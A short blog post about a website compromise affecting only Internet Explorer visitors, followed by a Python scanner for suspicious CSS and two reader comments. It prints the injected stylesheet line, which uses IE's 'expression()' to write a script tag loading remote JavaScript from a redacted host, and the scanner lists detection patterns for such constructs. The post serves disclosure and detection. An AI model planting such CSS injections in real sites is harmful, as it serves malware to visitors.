Fix: website hacked but only in IE

We’ve been playing the role of super-sleuths today, to try and work out why a client’s website was not working.

All was fine in Firefox and other normal browsers, but anybody visiting using IE (any version) got a malicious little JavaScript loading up an iframe with lots of other unwanted malware within it.

Checking the actual pages themselves gave no clues - there was no JavaScript other than the JavaScript I put there. A couple of minutes thinking, and we realised that the CSS file was the only common element to each page.

Downloading the CSS file, this is what we found:

html { width: expression(document.write("<script type=text/javascript src=http://XXXXXXXX.com/9bc7b2e1.js></script>")); }

… which explains why it only hit IE ('expression' being a proprietary Internet Explorer thing). Luckily in this case, it wasn't a massive CSS file, so this kind of stood out. If you're experiencing similar issues, then look out for this.

Now, just need to work out how the critters put it there…
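For stylesheets too large to eyeball, the check described above can be scripted. The following is an added example, not code from the original post: it flags `expression(` after stripping CSS comments and decoding hex escapes, and goes beyond the post by also flagging a few other script-bearing CSS constructs. The rule names, sample strings and placeholder host are constructed for illustration.

```python
import re
import sys

# IE tolerated comments inside the keyword, e.g. "expr/**/ession(".
_COMMENT = re.compile(r"/\*.*?\*/", re.S)
# CSS hex escapes such as "\65 " for "e", plus the one optional trailing space.
_HEX_ESCAPE = re.compile(r"\\([0-9a-fA-F]{1,6})[ \t\r\n\f]?")

# Constructs that let a stylesheet run script or pull in active content.
_SUSPICIOUS = {
    "ie-expression": re.compile(r"expression\s*\(", re.I),
    "ie-behavior": re.compile(r"(?<![\w-])behavior\s*:", re.I),
    "moz-binding": re.compile(r"-moz-binding\s*:", re.I),
    "javascript-url": re.compile(r"javascript\s*:", re.I),
    "script-tag": re.compile(r"<\s*script", re.I),
}

# Constructed samples; the host name is a placeholder, not the one in the post.
INJECTED = ('html { width: expression(document.write("<script type=text/javascript '
            'src=http://placeholder.invalid/x.js></script>")); }')
OBFUSCATED = "body { width: expr/* */ession(1); height: \\65xpression(2) }"
CLEAN = "html { scroll-behavior: smooth } /* no expression( here */"

def _unescape(match):
    code = int(match.group(1), 16)
    return chr(code) if 0 < code <= 0x10FFFF else "\ufffd"

def normalize(css):
    """Strip comments and decode hex escapes so obfuscated keywords still match."""
    return _HEX_ESCAPE.sub(_unescape, _COMMENT.sub("", css))

def scan_css(css):
    """Return (rule_name, excerpt) for each suspicious construct in the stylesheet."""
    text = normalize(css)
    findings = []
    for name, pattern in _SUSPICIOUS.items():
        for m in pattern.finditer(text):
            excerpt = " ".join(text[m.start():m.start() + 80].split())
            findings.append((name, excerpt))
    return findings

if __name__ == "__main__":
    # Usage: python scan_css.py style.css [more.css ...]
    for path in sys.argv[1:]:
        with open(path, encoding="utf-8", errors="replace") as fh:
            for name, excerpt in scan_css(fh.read()):
                print(f"{path}: {name}: {excerpt}")
```

A hit is a prompt to review the file by hand and compare it against a known-good copy, since some of these constructs also appear in legitimate legacy IE stylesheets.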

2 Responses to “Fix: website hacked but only in IE”


  1. Yar

    My guess would be weak passwords but hey, I’m sure there are some exploits out there for some plugins too.

  2. Walk coast

    Some good points in this article. Encouraging to see blogging actually worthy of a read. Keep up the efforts…
